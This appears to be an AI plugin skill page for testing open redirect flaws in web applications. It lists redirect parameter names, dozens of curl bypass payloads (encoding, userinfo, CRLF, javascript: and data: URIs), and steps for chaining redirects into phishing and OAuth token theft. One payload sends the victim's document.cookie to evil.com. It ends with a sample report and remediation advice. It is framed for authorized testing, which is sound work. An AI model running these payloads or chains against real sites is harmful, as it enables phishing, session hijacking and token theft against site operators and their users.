npx claudepluginhub plurigrid/asi --plugin asiThis skill uses the workspace's default tool permissions.
- When testing login/logout flows that redirect users to specified URLs
Tests open redirect vulnerabilities in web apps by identifying redirect parameters, applying bypass payloads, and chaining for phishing or token theft in login/OAuth/SSO flows.
Tests web apps for open redirect vulnerabilities via URL parameter analysis, bypass payloads like encoding/@ tricks, and chains for phishing/OAuth token theft.
Detects open redirect vulnerabilities (CWE-601) when redirecting to user-supplied URLs from params, forms, login flows, or OAuth callbacks. Suggests host allowlist validation fixes.
Share bugs, ideas, or general feedback.
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
# Common redirect parameter names to test:
# ?url= ?redirect= ?next= ?return= ?returnUrl= ?goto= ?target=
# ?dest= ?destination= ?redir= ?redirect_uri= ?continue= ?view=
# Search for redirect parameters in the application
# Use Burp Suite to crawl and identify all parameters
# Test basic redirect
curl -v "http://target.com/login?next=https://evil.com"
curl -v "http://target.com/logout?redirect=https://evil.com"
curl -v "http://target.com/oauth/authorize?redirect_uri=https://evil.com"
# Direct external URL
curl -v "http://target.com/redirect?url=https://evil.com"
# Protocol-relative URL
curl -v "http://target.com/redirect?url=//evil.com"
# URL with @ symbol (userinfo abuse)
curl -v "http://target.com/redirect?url=https://target.com@evil.com"
# Backslash-based redirect
curl -v "http://target.com/redirect?url=https://evil.com\@target.com"
# Null byte injection
curl -v "http://target.com/redirect?url=https://evil.com%00.target.com"
# Subdomain confusion bypass
curl -v "http://target.com/redirect?url=https://target.com.evil.com"
curl -v "http://target.com/redirect?url=https://evil.com/target.com"
# URL encoding bypass
curl -v "http://target.com/redirect?url=https%3A%2F%2Fevil.com"
curl -v "http://target.com/redirect?url=%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d"
# Double URL encoding
curl -v "http://target.com/redirect?url=%2568%2574%2574%2570%253A%252F%252Fevil.com"
# Mixed case protocol
curl -v "http://target.com/redirect?url=HtTpS://evil.com"
# CRLF injection in redirect
curl -v "http://target.com/redirect?url=%0d%0aLocation:%20https://evil.com"
# JavaScript protocol
curl -v "http://target.com/redirect?url=javascript:alert(document.domain)"
# Data URI
curl -v "http://target.com/redirect?url=data:text/html,<script>alert(1)</script>"
# Relative path injection
curl -v "http://target.com/redirect?url=/\evil.com"
curl -v "http://target.com/redirect?url=/.evil.com"
# Path traversal with redirect
curl -v "http://target.com/redirect?url=/../../../evil.com"
# Fragment-based bypass
curl -v "http://target.com/redirect?url=https://evil.com#target.com"
# Parameter pollution for redirect
curl -v "http://target.com/redirect?url=https://target.com&url=https://evil.com"
# Chain with OAuth for token theft
# Step 1: Find open redirect on target.com
# Step 2: Use it as redirect_uri in OAuth flow
curl -v "http://target.com/oauth/authorize?client_id=CLIENT&redirect_uri=http://target.com/redirect?url=https://evil.com&response_type=code"
# Chain with phishing
# Create convincing phishing page at evil.com
# Use open redirect: http://target.com/redirect?url=https://evil.com/login
# Victim sees target.com in the initial URL
# Chain with XSS via javascript: protocol
curl -v "http://target.com/redirect?url=javascript:fetch('https://evil.com/?c='+document.cookie)"
# Use OpenRedireX for automated testing
python3 openredirex.py -l urls.txt -p payloads.txt --keyword FUZZ
# Use gf tool to extract redirect parameters from URLs
cat urls.txt | gf redirect | sort -u > redirect_params.txt
# Mass test with nuclei
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/open-redirect.yaml
# Test with ffuf
ffuf -w open-redirect-payloads.txt -u "http://target.com/redirect?url=FUZZ" -mr "Location: https://evil"
| Concept | Description |
|---|---|
| Unvalidated Redirect | Application redirects to user-supplied URL without checking destination |
| URL Parsing Inconsistency | Different libraries parse URLs differently, enabling bypass |
| Protocol-Relative URL | Using // prefix to redirect while inheriting current protocol |
| Userinfo Abuse | Using @ symbol to make URL appear to belong to trusted domain |
| Open Redirect Chain | Combining multiple open redirects or chaining with other vulnerabilities |
| DOM-Based Redirect | Client-side JavaScript performing redirect using attacker-controlled input |
| Meta Refresh Redirect | HTML meta tag performing redirect without server-side 302 |
| Tool | Purpose |
|---|---|
| OpenRedireX | Automated open redirect vulnerability testing tool |
| Burp Suite | HTTP proxy for intercepting and modifying redirect parameters |
| gf (tomnomnom) | Pattern matcher to extract redirect parameters from URL lists |
| nuclei | Template-based scanner with open redirect detection templates |
| ffuf | Fuzzer for mass-testing redirect parameter payloads |
| OWASP ZAP | Automated scanner with open redirect detection |
## Open Redirect Assessment Report
- **Target**: http://target.com
- **Vulnerable Parameters Found**: 3
- **Bypass Techniques Required**: URL encoding, userinfo abuse
### Findings
| # | Endpoint | Parameter | Payload | Impact |
|---|----------|-----------|---------|--------|
| 1 | /login | next | //evil.com | Phishing |
| 2 | /oauth/authorize | redirect_uri | https://target.com@evil.com | Token Theft |
| 3 | /logout | return | https://evil.com%00.target.com | Session Redirect |
### Remediation
- Implement allowlist of permitted redirect destinations
- Validate redirect URLs server-side using strict URL parsing
- Reject any redirect URL containing external domains
- Use indirect reference maps instead of direct URL parameters